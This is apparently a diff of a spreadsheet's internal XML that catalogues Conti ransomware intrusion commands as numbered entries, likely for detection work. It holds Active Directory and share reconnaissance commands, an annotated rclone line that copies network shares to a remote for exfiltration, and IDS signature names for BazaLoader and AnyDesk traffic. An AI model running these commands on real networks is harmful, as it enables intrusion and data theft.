+    <t xml:space="preserve">adfind.exe -subnets -f (objectcategory=subnet)  </t>
+  </si>
+  <si>
+    <t>adfind.exe -f "(objectcategory=group)"</t>
+  </si>
+  <si>
+    <t xml:space="preserve">net use </t>
+  </si>
+  <si>
+    <t>netstat -ano</t>
+  </si>
+  <si>
+    <t>net group "domain admins" /domain</t>
+  </si>
+  <si>
+    <t xml:space="preserve">arp -a </t>
+  </si>
+  <si>
+    <t>ping -n 1 hostname &gt;&gt; C:\programdata\log.txt</t>
+  </si>
+  <si>
+    <t>Advanced_IP_Scanner_2.5.3850.exe</t>
+  </si>
+  <si>
+    <t>Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\shares.txt</t>
+  </si>
+  <si>
+    <t>Get-NetDomain</t>
+  </si>
+  <si>
+    <t>Get-NetCurrentUser</t>
+  </si>
+  <si>
+    <t>Get-ADDomainController</t>
+  </si>
+  <si>
+    <t>Get-ADDomainController -Filter * | ft</t>
+  </si>
+  <si>
+    <t>Get-ADComputer -Filter * -Properties * | Get-Member</t>
+  </si>
+  <si>
+    <t>Get-ADDomain</t>
+  </si>
+  <si>
+    <t>dir "\\hostname\c$\Program Files\* &gt;&gt; C:\programdata\AV.txt</t>
+  </si>
+  <si>
+    <t xml:space="preserve">rclone.exe copy--max-age 3y "\\&lt;redacted&gt;\C$\Shares" remote: &lt;redacted&gt;\&lt;redacted&gt; --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P </t>
+  </si>
+  <si>
+    <t>CMDline args 
+- copy: Copy the source to the destination 
+- --max-age: Only transfer files younger than &lt;time&gt; 
+- \\&lt;redacted&gt;B: From source 
+- remote: &lt;redacted&gt;\&lt;redacted&gt;: To destination folder 
+- Bwlimit 2M: Bandwidth limit 
+- -q: quiet 
+- --ignore-existing: Skip all files that exist on destination 
+- --auto-confirm: Do not request console confirmation 
+- --multi-thread-streams: Max number of streams to use for multi-thread downloads 
+- --transfers: Number of file transfers to run in parallel 
+- -P: Show progress</t>
+  </si>
+  <si>
+    <t>ET TROJAN Observed Malicious SSL Cert (BazaLoader CnC) 
+ET MALWARE Observed Malicious SSL Cert (Bazar Backdoor) 
+ET POLICY IP Check Domain (myexternalip .com in TLS SNI) 
+ET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software) 
+ET USER_AGENTS AnyDesk Remote Desktop Software User-Agent 
+ET POLICY HTTP POST to MEGA Userstorage</t>
+  </si>
+  <si>
+    <t>conti-eid0242</t>
+  </si>
+  <si>
+    <t>conti-eid0243</t>
+  </si>
+  <si>
+    <t>conti-eid0244</t>
+  </si>
+  <si>
+    <t>conti-eid0245</t>
+  </si>
+  <si>
+    <t>conti-eid0246</t>
+  </si>
+  <si>
+    <t>conti-eid0247</t>
+  </si>
+  <si>
+    <t>conti-eid0248</t>
+  </si>
+  <si>
+    <t>conti-eid0249</t>
+  </si>
+  <si>
+    <t>conti-eid0250</t>
+  </si>
+  <si>
+    <t>conti-eid0251</t>
+  </si>
+  <si>
+    <t>conti-eid0252</t>
+  </si>
+  <si>
+    <t>conti-eid0253</t>
+  </si>
+  <si>
+    <t>conti-eid0254</t>
+  </si>
+  <si>
+    <t>conti-eid0255</t>
+  </si>
+  <si>
+    <t>conti-eid0256</t>
+  </si>
+  <si>
+    <t>conti-eid0257</t>
+  </si>
+  <si>
+    <t>conti-eid0258</t>
+  </si>
+  <si>
+    <t>conti-eid0259</t>
+  </si>
+  <si>
+    <t>conti-eid0260</t>
+  </si>
+  <si>
+    <t>conti-eid0261</t>
+  </si>
+  <si>
+    <t>conti-eid0262</t>
+  </si>
+  <si>
+    <t>conti-eid0263</t>
+  </si>
+  <si>
+    <t>conti-eid0264</t>
+  </si>
+  <si>
+    <t>conti-eid0265</t>
+  </si>
+  <si>
+    <t>conti-eid0266</t>
+  </si>
+  <si>
+    <t>conti-eid0267</t>
+  </si>
+  <si>
+    <t>conti-eid0268</t>
+  </si>
+  <si>
+    <t>conti-eid0269</t>
+  </si>
+  <si>
+    <t>conti-eid0270</t>
+  </si>
+  <si>
+    <t>conti-eid0271</t>
+  </si>
+  <si>
+    <t>conti-eid0272</t>
+  </si>
+  <si>
+    <t>conti-eid0273</t>
+  </si>
+  <si>
+    <t>conti-eid0274</t>
+  </si>
+  <si>
+    <t>conti-eid0275</t>
+  </si>
+  <si>
+    <t>conti-eid0276</t>
+  </si>
+  <si>
+    <t>conti-eid0277</t>
+  </si>
+  <si>
+    <t>conti-eid0278</t>
+  </si>
+  <si>
+    <t>conti-eid0279</t>
+  </si>
+  <si>
+    <t>conti-eid0280</t>
+  </si>
+  <si>
+    <t>conti-eid0281</t>
+  </si>
+  <si>
+    <t>conti-eid0282</t>
+  </si>
+  <si>
+    <t>conti-eid0283</t>
+  </si>
+  <si>
+    <t>conti-eid0284</t>
+  </si>
+  <si>
+    <t>conti-eid0285</t>
+  </si>
+  <si>
+    <t>conti-eid0286</t>
+  </si>
+  <si>
+    <t>conti-eid0287</t>
+  </si>
+  <si>
+    <t>conti-eid0288</t>
+  </si>
+  <si>
+    <t>conti-eid0289</t>
+  </si>
+  <si>
+    <t>conti-eid0290</t>
+  </si>
+  <si>
+    <t>conti-eid0291</t>
+  </si>
+  <si>
+    <t>conti-eid0292</t>
+  </si>
+  <si>
+    <t>conti-eid0293</t>
+  </si>
+  <si>
+    <t>conti-eid0294</t>
+  </si>
+  <si>
+    <t>conti-eid0295</t>
+  </si>
+  <si>
+    <t>conti-eid0296</t>
+  </si>
+  <si>
+    <t>conti-eid0297</t>
+  </si>
+  <si>
+    <t>conti-eid0298</t>
+  </si>
+  <si>
+    <t>conti-eid0299</t>
+  </si>
+  <si>
+    <t>conti-eid0300</t>
+  </si>
+  <si>
+    <t>{"object": "process_create", "process_command_line": "cmd c/ nltest /domain_trusts /all_trusts", "C:\Windows\system32\svchost.exe -k UnistackSvcGroup"}</t>
+  </si>
+  <si>
+    <t>conti-eid0301</t>
   </si>
 </sst>
 </file>
 
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
 <styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="x14ac x16r2 xr">
-  <fonts count="3" x14ac:knownFonts="1">
+  <fonts count="2" x14ac:knownFonts="1">
     <font>
       <sz val="12"/>
       <color theme="1"/>
@@ -1044,29 +2102,16 @@
       <family val="2"/>
       <scheme val="minor"/>
     </font>
-    <font>
-      <sz val="12"/>
-      <color rgb="FF000000"/>
-      <name val="Aptos Narrow"/>
-      <family val="2"/>
-      <scheme val="minor"/>
-    </font>
   </fonts>
-  <fills count="3">
+  <fills count="2">
     <fill>
       <patternFill patternType="none"/>
     </fill>
     <fill>
       <patternFill patternType="gray125"/>
     </fill>
-    <fill>
-      <patternFill patternType="solid">
-        <fgColor rgb="FFD9D9D9"/>
-        <bgColor rgb="FFD9D9D9"/>
-      </patternFill>
-    </fill>
   </fills>
-  <borders count="2">
+  <borders count="1">
     <border>
       <left/>
       <right/>
@@ -1074,31 +2119,13 @@
       <bottom/>
       <diagonal/>
     </border>
-    <border>
-      <left style="thin">
-        <color rgb="FF000000"/>
-      </left>
-      <right style="thin">
-        <color rgb="FF000000"/>
-      </right>
-      <top style="thin">
-        <color rgb="FF000000"/>
-      </top>
-      <bottom style="thin">
-        <color rgb="FF000000"/>
-      </bottom>
-      <diagonal/>
-    </border>
   </borders>
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
-  <cellXfs count="3">
+  <cellXfs count="2">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
-      <alignment wrapText="1"/>
-    </xf>
-    <xf numFmtId="0" fontId="2" fillId="2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment wrapText="1"/>
     </xf>
   </cellXfs>
@@ -1144,10 +2171,10 @@
 </file>
 
 <file path=xl/tables/table1.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:G142" totalsRowShown="0" dataDxfId="7">
-  <autoFilter ref="A1:G142" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
-  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:G142">
-    <sortCondition ref="A1:A142"/>
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:G302" totalsRowShown="0" dataDxfId="7">
+  <autoFilter ref="A1:G302" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
+  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:G301">
+    <sortCondition ref="A1:A301"/>
   </sortState>
   <tableColumns count="7">
     <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="6"/>
@@ -1479,17 +2506,17 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{CADA5849-2682-F643-8842-EFF560F6FB5C}">
-  <dimension ref="A1:G142"/>
+  <dimension ref="A1:G302"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
-      <pane ySplit="1" topLeftCell="A131" activePane="bottomLeft" state="frozen"/>
-      <selection pane="bottomLeft" activeCell="G79" sqref="G79"/>
+      <pane ySplit="1" topLeftCell="A260" activePane="bottomLeft" state="frozen"/>
+      <selection pane="bottomLeft" activeCell="E272" sqref="E272"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
   <cols>
     <col min="1" max="1" width="15.1640625" customWidth="1"/>
-    <col min="2" max="2" width="16.6640625" customWidth="1"/>
+    <col min="2" max="2" width="16.1640625" customWidth="1"/>
     <col min="3" max="3" width="21.5" customWidth="1"/>
     <col min="4" max="4" width="13.6640625" bestFit="1" customWidth="1"/>
     <col min="5" max="5" width="126.1640625" customWidth="1"/>
@@ -1526,7 +2553,9 @@
       </c>
       <c r="B2" s="1"/>
       <c r="C2" s="1"/>
-      <c r="D2" s="1"/>
+      <c r="D2" s="1" t="s">
+        <v>290</v>
+      </c>
       <c r="E2" s="1" t="s">
         <v>8</v>
       </c>
@@ -1541,7 +2570,9 @@
       </c>
       <c r="B3" s="1"/>
       <c r="C3" s="1"/>
-      <c r="D3" s="1"/>
+      <c r="D3" s="1" t="s">
+        <v>290</v>
+      </c>
       <c r="E3" s="1" t="s">
         <v>11</v>
       </c>
@@ -1556,7 +2587,9 @@
       </c>
       <c r="B4" s="1"/>
       <c r="C4" s="1"/>
-      <c r="D4" s="1"/>
+      <c r="D4" s="1" t="s">
+        <v>290</v>
+      </c>
       <c r="E4" s="1" t="s">
         <v>13</v>
       </c>
@@ -1570,10 +2603,12 @@
         <v>14</v>
       </c>
       <c r="B5" s="1" t="s">
-        <v>291</v>
+        <v>313</v>
       </c>
       <c r="C5" s="1"/>
-      <c r="D5" s="1"/>
+      <c r="D5" s="1" t="s">
+        <v>290</v>
+      </c>
       <c r="E5" s="1" t="s">
         <v>15</v>
       </c>
@@ -1587,10 +2622,12 @@
         <v>16</v>
       </c>
       <c r="B6" s="1" t="s">
-        <v>292</v>
+        <v>313</v>
       </c>
       <c r="C6" s="1"/>
-      <c r="D6" s="1"/>
+      <c r="D6" s="1" t="s">
+        <v>290</v>
+      </c>
       <c r="E6" s="1" t="s">
         <v>17</v>
       </c>
@@ -1604,10 +2641,12 @@
         <v>18</v>
       </c>
       <c r="B7" s="1" t="s">
-        <v>291</v>
+        <v>313</v>
       </c>
       <c r="C7" s="1"/>
-      <c r="D7" s="1"/>
+      <c r="D7" s="1" t="s">
+        <v>290</v>
+      </c>
       <c r="E7" s="1" t="s">
         <v>19</v>
       </c>
@@ -1620,11 +2659,13 @@
       <c r="A8" s="1" t="s">
         <v>20</v>
       </c>
-      <c r="B8" s="2" t="s">
-        <v>292</v>
+      <c r="B8" s="1" t="s">
+        <v>313</v>
       </c>
       <c r="C8" s="1"/>
-      <c r="D8" s="1"/>
+      <c r="D8" s="1" t="s">
+        <v>290</v>
+      </c>
       <c r="E8" s="1" t="s">
         <v>21</v>
       </c>
@@ -1637,7 +2678,9 @@
       <c r="A9" s="1" t="s">
         <v>22</v>
       </c>
-      <c r="B9" s="1"/>
+      <c r="B9" s="1" t="s">
+        <v>326</v>
+      </c>
       <c r="C9" s="1"/>
       <c r="D9" s="1"/>
       <c r="E9" s="1" t="s">
@@ -1654,7 +2697,9 @@
       </c>
       <c r="B10" s="1"/>
       <c r="C10" s="1"/>
-      <c r="D10" s="1"/>
+      <c r="D10" s="1" t="s">
+        <v>295</v>
+      </c>
       <c r="E10" s="1" t="s">
         <v>25</v>
       </c>
@@ -1669,7 +2714,9 @@
       </c>
       <c r="B11" s="1"/>
       <c r="C11" s="1"/>
-      <c r="D11" s="1"/>
+      <c r="D11" s="1" t="s">
+        <v>295</v>
+      </c>
       <c r="E11" s="1" t="s">
         <v>27</v>
       </c>
@@ -1684,7 +2731,9 @@
       </c>
       <c r="B12" s="1"/>
       <c r="C12" s="1"/>
-      <c r="D12" s="1"/>
+      <c r="D12" s="1" t="s">
+        <v>295</v>
+      </c>
       <c r="E12" s="1" t="s">
         <v>29</v>
       </c>
@@ -1699,7 +2748,9 @@
       </c>
       <c r="B13" s="1"/>
       <c r="C13" s="1"/>
-      <c r="D13" s="1"/>
+      <c r="D13" s="1" t="s">
+        <v>290</v>
+      </c>
       <c r="E13" s="1" t="s">
         <v>31</v>
       </c>
@@ -1712,7 +2763,9 @@
       <c r="A14" s="1" t="s">
         <v>32</v>
       </c>
-      <c r="B14" s="1"/>
+      <c r="B14" s="1" t="s">
+        <v>317</v>
+      </c>
       <c r="C14" s="1"/>
       <c r="D14" s="1"/>
       <c r="E14" s="1" t="s">
@@ -1723,15 +2776,17 @@
         <v>9</v>
       </c>
     </row>
-    <row r="15" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+    <row r="15" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A15" s="1" t="s">
         <v>34</v>
       </c>
-      <c r="B15" s="1"/>
+      <c r="B15" s="1" t="s">
+        <v>326</v>
+      </c>
       <c r="C15" s="1"/>
       <c r="D15" s="1"/>
       <c r="E15" s="1" t="s">
-        <v>35</v>
+        <v>328</v>
       </c>
       <c r="F15" s="1"/>
       <c r="G15" s="1" t="s">
@@ -1740,13 +2795,17 @@
     </row>
     <row r="16" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A16" s="1" t="s">
+        <v>35</v>
+      </c>
+      <c r="B16" s="1" t="s">
+        <v>326</v>
+      </c>
+      <c r="C16" s="1"/>
+      <c r="D16" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E16" s="1" t="s">
         <v>36</v>
-      </c>
-      <c r="B16" s="1"/>
-      <c r="C16" s="1"/>
-      <c r="D16" s="1"/>
-      <c r="E16" s="1" t="s">
-        <v>37</v>
       </c>
       <c r="F16" s="1"/>
       <c r="G16" s="1" t="s">
@@ -1755,13 +2814,17 @@
     </row>
     <row r="17" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A17" s="1" t="s">
+        <v>37</v>
+      </c>
+      <c r="B17" s="1" t="s">
+        <v>315</v>
+      </c>
+      <c r="C17" s="1"/>
+      <c r="D17" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E17" s="1" t="s">
         <v>38</v>
-      </c>
-      <c r="B17" s="1"/>
-      <c r="C17" s="1"/>
-      <c r="D17" s="1"/>
-      <c r="E17" s="1" t="s">
-        <v>39</v>
       </c>
       <c r="F17" s="1"/>
       <c r="G17" s="1" t="s">
@@ -1770,13 +2833,17 @@
     </row>
     <row r="18" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A18" s="1" t="s">
+        <v>39</v>
+      </c>
+      <c r="B18" s="1" t="s">
+        <v>315</v>
+      </c>
+      <c r="C18" s="1"/>
+      <c r="D18" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E18" s="1" t="s">
         <v>40</v>
-      </c>
-      <c r="B18" s="1"/>
-      <c r="C18" s="1"/>
-      <c r="D18" s="1"/>
-      <c r="E18" s="1" t="s">
-        <v>41</v>
       </c>
       <c r="F18" s="1"/>
       <c r="G18" s="1" t="s">
@@ -1785,13 +2852,17 @@
     </row>
     <row r="19" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A19" s="1" t="s">
-        <v>42</v>
-      </c>
-      <c r="B19" s="1"/>
+        <v>41</v>
+      </c>
+      <c r="B19" s="1" t="s">
+        <v>315</v>
+      </c>
       <c r="C19" s="1"/>
-      <c r="D19" s="1"/>
+      <c r="D19" s="1" t="s">
+        <v>290</v>
+      </c>
       <c r="E19" s="1" t="s">
-        <v>43</v>
+        <v>291</v>
       </c>
       <c r="F19" s="1"/>
       <c r="G19" s="1" t="s">
@@ -1800,13 +2871,17 @@
     </row>
     <row r="20" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A20" s="1" t="s">
-        <v>44</v>
-      </c>
-      <c r="B20" s="1"/>
+        <v>42</v>
+      </c>
+      <c r="B20" s="1" t="s">
+        <v>317</v>
+      </c>
       <c r="C20" s="1"/>
-      <c r="D20" s="1"/>
+      <c r="D20" s="1" t="s">
+        <v>290</v>
+      </c>
       <c r="E20" s="1" t="s">
-        <v>45</v>
+        <v>43</v>
       </c>
       <c r="F20" s="1"/>
       <c r="G20" s="1" t="s">
@@ -1815,13 +2890,17 @@
     </row>
     <row r="21" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A21" s="1" t="s">
-        <v>46</v>
-      </c>
-      <c r="B21" s="1"/>
+        <v>44</v>
+      </c>
+      <c r="B21" s="1" t="s">
+        <v>317</v>
+      </c>
       <c r="C21" s="1"/>
-      <c r="D21" s="1"/>
+      <c r="D21" s="1" t="s">
+        <v>290</v>
+      </c>
       <c r="E21" s="1" t="s">
-        <v>47</v>
+        <v>45</v>
       </c>
       <c r="F21" s="1"/>
       <c r="G21" s="1" t="s">
@@ -1830,13 +2909,17 @@
     </row>
     <row r="22" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A22" s="1" t="s">
-        <v>48</v>
-      </c>
-      <c r="B22" s="1"/>
+        <v>46</v>
+      </c>
+      <c r="B22" s="1" t="s">
+        <v>304</v>
+      </c>
       <c r="C22" s="1"/>
-      <c r="D22" s="1"/>
+      <c r="D22" s="1" t="s">
+        <v>290</v>
+      </c>
       <c r="E22" s="1" t="s">
-        <v>49</v>
+        <v>47</v>
       </c>
       <c r="F22" s="1"/>
       <c r="G22" s="1" t="s">
@@ -1845,13 +2928,17 @@
     </row>
     <row r="23" spans="1:7" ht="68" x14ac:dyDescent="0.2">
       <c r="A23" s="1" t="s">
-        <v>50</v>
-      </c>
-      <c r="B23" s="1"/>
+        <v>48</v>
+      </c>
+      <c r="B23" s="1" t="s">
+        <v>305</v>
+      </c>
       <c r="C23" s="1"/>
-      <c r="D23" s="1"/>
+      <c r="D23" s="1" t="s">
+        <v>290</v>
+      </c>
       <c r="E23" s="1" t="s">
-        <v>51</v>
+        <v>49</v>
       </c>
       <c r="F23" s="1"/>
       <c r="G23" s="1" t="s">
@@ -1860,13 +2947,17 @@
     </row>
     <row r="24" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A24" s="1" t="s">
-        <v>52</v>
-      </c>
-      <c r="B24" s="1"/>
+        <v>50</v>
+      </c>
+      <c r="B24" s="1" t="s">
+        <v>321</v>
+      </c>
       <c r="C24" s="1"/>
-      <c r="D24" s="1"/>
+      <c r="D24" s="1" t="s">
+        <v>290</v>
+      </c>
       <c r="E24" s="1" t="s">
-        <v>53</v>
+        <v>51</v>
       </c>
       <c r="F24" s="1"/>
       <c r="G24" s="1" t="s">
@@ -1875,13 +2966,17 @@
     </row>
     <row r="25" spans="1:7" ht="68" x14ac:dyDescent="0.2">
       <c r="A25" s="1" t="s">
-        <v>54</v>
-      </c>
-      <c r="B25" s="1"/>
+        <v>52</v>
+      </c>
+      <c r="B25" s="1" t="s">
+        <v>306</v>
+      </c>
       <c r="C25" s="1"/>
-      <c r="D25" s="1"/>
+      <c r="D25" s="1" t="s">
+        <v>290</v>
+      </c>
       <c r="E25" s="1" t="s">
-        <v>55</v>
+        <v>53</v>
       </c>
       <c r="F25" s="1"/>
       <c r="G25" s="1" t="s">
@@ -1890,36 +2985,36 @@
     </row>
     <row r="26" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A26" s="1" t="s">
-        <v>56</v>
+        <v>54</v>
       </c>
       <c r="B26" s="1" t="s">
-        <v>296</v>
+        <v>309</v>
       </c>
       <c r="C26" s="1"/>
       <c r="D26" s="1" t="s">
-        <v>302</v>
+        <v>290</v>
       </c>
       <c r="E26" s="1" t="s">
-        <v>57</v>
+        <v>55</v>
       </c>
       <c r="F26" s="1"/>
       <c r="G26" s="1" t="s">
         <v>9</v>
       </c>
     </row>
-    <row r="27" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+    <row r="27" spans="1:7" ht="51" x14ac:dyDescent="0.2">
       <c r="A27" s="1" t="s">
-        <v>58</v>
+        <v>56</v>
       </c>
       <c r="B27" s="1" t="s">
-        <v>296</v>
+        <v>307</v>
       </c>
       <c r="C27" s="1"/>
       <c r="D27" s="1" t="s">
-        <v>302</v>
+        <v>290</v>
       </c>
       <c r="E27" s="1" t="s">
-        <v>59</v>
+        <v>57</v>
       </c>
       <c r="F27" s="1"/>
       <c r="G27" s="1" t="s">
@@ -1928,17 +3023,17 @@
     </row>
     <row r="28" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A28" s="1" t="s">
-        <v>60</v>
+        <v>58</v>
       </c>
       <c r="B28" s="1" t="s">
-        <v>296</v>
+        <v>309</v>
       </c>
       <c r="C28" s="1"/>
       <c r="D28" s="1" t="s">
-        <v>302</v>
+        <v>290</v>
       </c>
       <c r="E28" s="1" t="s">
-        <v>61</v>
+        <v>59</v>
       </c>
       <c r="F28" s="1"/>
       <c r="G28" s="1" t="s">
@@ -1947,13 +3042,17 @@
     </row>
     <row r="29" spans="1:7" ht="85" x14ac:dyDescent="0.2">
       <c r="A29" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="B29" s="1"/>
+        <v>60</v>
+      </c>
+      <c r="B29" s="1" t="s">
+        <v>319</v>
+      </c>
       <c r="C29" s="1"/>
-      <c r="D29" s="1"/>
+      <c r="D29" s="1" t="s">
+        <v>294</v>
+      </c>
       <c r="E29" s="1" t="s">
-        <v>63</v>
+        <v>61</v>
       </c>
       <c r="F29" s="1"/>
       <c r="G29" s="1" t="s">
@@ -1962,13 +3061,17 @@
     </row>
     <row r="30" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A30" s="1" t="s">
-        <v>64</v>
-      </c>
-      <c r="B30" s="1"/>
+        <v>62</v>
+      </c>
+      <c r="B30" s="1" t="s">
+        <v>312</v>
+      </c>
       <c r="C30" s="1"/>
-      <c r="D30" s="1"/>
+      <c r="D30" s="1" t="s">
+        <v>290</v>
+      </c>
       <c r="E30" s="1" t="s">
-        <v>65</v>
+        <v>63</v>
       </c>
       <c r="F30" s="1"/>
       <c r="G30" s="1" t="s">
@@ -1977,13 +3080,17 @@
     </row>
     <row r="31" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A31" s="1" t="s">
-        <v>66</v>
-      </c>
-      <c r="B31" s="1"/>
+        <v>64</v>
+      </c>
+      <c r="B31" s="1" t="s">
+        <v>312</v>
+      </c>
       <c r="C31" s="1"/>
-      <c r="D31" s="1"/>
+      <c r="D31" s="1" t="s">
+        <v>290</v>
+      </c>
       <c r="E31" s="1" t="s">
-        <v>67</v>
+        <v>65</v>
       </c>
       <c r="F31" s="1"/>
       <c r="G31" s="1" t="s">
@@ -1992,13 +3099,17 @@
     </row>
     <row r="32" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A32" s="1" t="s">
-        <v>68</v>
-      </c>
-      <c r="B32" s="1"/>
+        <v>66</v>
+      </c>
+      <c r="B32" s="1" t="s">
+        <v>312</v>
+      </c>
       <c r="C32" s="1"/>
-      <c r="D32" s="1"/>
+      <c r="D32" s="1" t="s">
+        <v>290</v>
+      </c>
       <c r="E32" s="1" t="s">
-        <v>69</v>
+        <v>67</v>
       </c>
       <c r="F32" s="1"/>
       <c r="G32" s="1" t="s">
@@ -2007,13 +3118,17 @@
     </row>
     <row r="33" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A33" s="1" t="s">
-        <v>70</v>
-      </c>
-      <c r="B33" s="1"/>
+        <v>68</v>
+      </c>
+      <c r="B33" s="1" t="s">
+        <v>324</v>
+      </c>
       <c r="C33" s="1"/>
-      <c r="D33" s="1"/>
+      <c r="D33" s="1" t="s">
+        <v>290</v>
+      </c>
       <c r="E33" s="1" t="s">
-        <v>71</v>
+        <v>69</v>
       </c>
       <c r="F33" s="1"/>
       <c r="G33" s="1" t="s">
@@ -2022,13 +3137,17 @@
     </row>
     <row r="34" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A34" s="1" t="s">
-        <v>72</v>
-      </c>
-      <c r="B34" s="1"/>
+        <v>70</v>
+      </c>
+      <c r="B34" s="1" t="s">
+        <v>324</v>
+      </c>
       <c r="C34" s="1"/>
-      <c r="D34" s="1"/>
+      <c r="D34" s="1" t="s">
+        <v>290</v>
+      </c>
       <c r="E34" s="1" t="s">
-        <v>73</v>
+        <v>71</v>
       </c>
       <c r="F34" s="1"/>
       <c r="G34" s="1" t="s">
@@ -2037,13 +3156,15 @@
     </row>
     <row r="35" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A35" s="1" t="s">
-        <v>74</v>
+        <v>72</v>
       </c>
       <c r="B35" s="1"/>
       <c r="C35" s="1"/>
-      <c r="D35" s="1"/>
+      <c r="D35" s="1" t="s">
+        <v>295</v>
+      </c>
       <c r="E35" s="1" t="s">
-        <v>75</v>
+        <v>73</v>
       </c>
       <c r="F35" s="1"/>
       <c r="G35" s="1" t="s">
@@ -2052,13 +3173,17 @@
     </row>
     <row r="36" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A36" s="1" t="s">
-        <v>76</v>
-      </c>
-      <c r="B36" s="1"/>
+        <v>74</v>
+      </c>
+      <c r="B36" s="1" t="s">
+        <v>314</v>
+      </c>
       <c r="C36" s="1"/>
-      <c r="D36" s="1"/>
+      <c r="D36" s="1" t="s">
+        <v>290</v>
+      </c>
       <c r="E36" s="1" t="s">
-        <v>77</v>
+        <v>75</v>
       </c>
       <c r="F36" s="1"/>
       <c r="G36" s="1" t="s">
@@ -2067,13 +3192,17 @@
     </row>
     <row r="37" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A37" s="1" t="s">
-        <v>78</v>
-      </c>
-      <c r="B37" s="1"/>
+        <v>76</v>
+      </c>
+      <c r="B37" s="1" t="s">
+        <v>308</v>
+      </c>
       <c r="C37" s="1"/>
-      <c r="D37" s="1"/>
+      <c r="D37" s="1" t="s">
+        <v>290</v>
+      </c>
       <c r="E37" s="1" t="s">
-        <v>79</v>
+        <v>77</v>
       </c>
       <c r="F37" s="1"/>
       <c r="G37" s="1" t="s">
@@ -2082,13 +3211,17 @@
     </row>
     <row r="38" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A38" s="1" t="s">
-        <v>80</v>
-      </c>
-      <c r="B38" s="1"/>
+        <v>78</v>
+      </c>
+      <c r="B38" s="1" t="s">
+        <v>323</v>
+      </c>
       <c r="C38" s="1"/>
-      <c r="D38" s="1"/>
+      <c r="D38" s="1" t="s">
+        <v>290</v>
+      </c>
       <c r="E38" s="1" t="s">
-        <v>81</v>
+        <v>79</v>
       </c>
       <c r="F38" s="1"/>
       <c r="G38" s="1" t="s">
